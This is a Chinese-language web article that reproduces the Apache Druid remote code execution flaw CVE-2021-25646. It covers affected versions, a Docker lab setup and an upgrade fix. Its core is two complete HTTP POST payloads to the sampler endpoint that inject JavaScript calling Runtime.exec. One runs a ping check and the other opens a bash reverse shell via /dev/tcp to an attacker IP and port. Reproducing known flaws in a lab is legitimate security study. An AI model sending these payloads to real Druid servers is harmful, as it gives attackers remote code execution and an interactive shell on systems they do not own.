apache-druid远程代码执行漏洞(CVE-2021-25646)-棉花糖会员站

# Apache Druid 远程代码执行漏洞（CVE-2021-25646）

# 漏洞概述

Apache Druid是美国阿帕奇软件（Apache）基金会的一款使用Java语言编写的、面向列的开源分布式数据库。

Apache Druid 0.20.0和更早的版本存在访问控制错误漏洞，该漏洞允许经过身份验证的用户强制Druid运行用户提供的JavaScript代码，并执行服务器进程特权的代码。

# 影响版本

“`
Apache Druid < 0.20.1 ``` # 搭建环境 ``` 为了复现方便，这里使用docker搭建环境 docker search docker-druid #搜索镜像 docker pull fokkodriesprong/docker-druid #拉取镜像 docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid #启动镜像 ``` 注：如果大家拉取镜像比较慢可以配置一下国内镜像源，这里我使用的是阿里云的加速源URL为:https://cr.console.aliyun.com/ \## 本机访问IP:888端口显示该页面表示启动成功 ![image-20210220145956286img](/static/yougar/Web安全/Apache Druid/resource/apache-druid远程代码执行漏洞CVE-2021-25646/media/image-20210220145956286.png) # 漏洞复现 \## POC使用DNSlog检测是否可以执行命令 ``` POST /druid/indexer/v1/sampler?for=filter HTTP/1.1 Host: 192.168.30.137:8888 Content-Length: 604 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.30.137:8888 Referer: http://192.168.30.137:8888/unified-console.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('ping XXXX')}", "dimension":"added", "":{ "enabled":"true" } }}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}} ``` ![image-20210220150109610img](/static/yougar/Web安全/Apache Druid/resource/apache-druid远程代码执行漏洞CVE-2021-25646/media/image-20210220150109610.png) \## 反弹shell 这里说一下踩的坑之前是用0.20.0版本做的复测，发现在0.20.0版本使用/bin/bash命令时服务器会报错,应该是做了过滤 ![image-20210220150134585img](/static/yougar/Web安全/Apache Druid/resource/apache-druid远程代码执行漏洞CVE-2021-25646/media/image-20210220150134585.png) 所以改用了0.17.0版本来进行测试，其他版本请自测 ``` POST /druid/indexer/v1/sampler?for=filter HTTP/1.1 Host: 192.168.30.137:8888 Content-Length: 604 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.30.137:8888 Referer: http://192.168.30.137:8888/unified-console.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/IP/PORT 0>&1′)}”,
“dimension”:”added”,
“”:{
“enabled”:”true”
}
}}}},”samplerConfig”:{“numRows”:500,”timeoutMs”:15000}}
“`

![image-20210220150159397img](/static/yougar/Web安全/Apache Druid/resource/apache-druid远程代码执行漏洞CVE-2021-25646/media/image-20210220150159397.png)

**修复方式**

升级到最新版Apache Druid 0.20.1

文章版权归作者所有，未经允许请勿转载。

THE END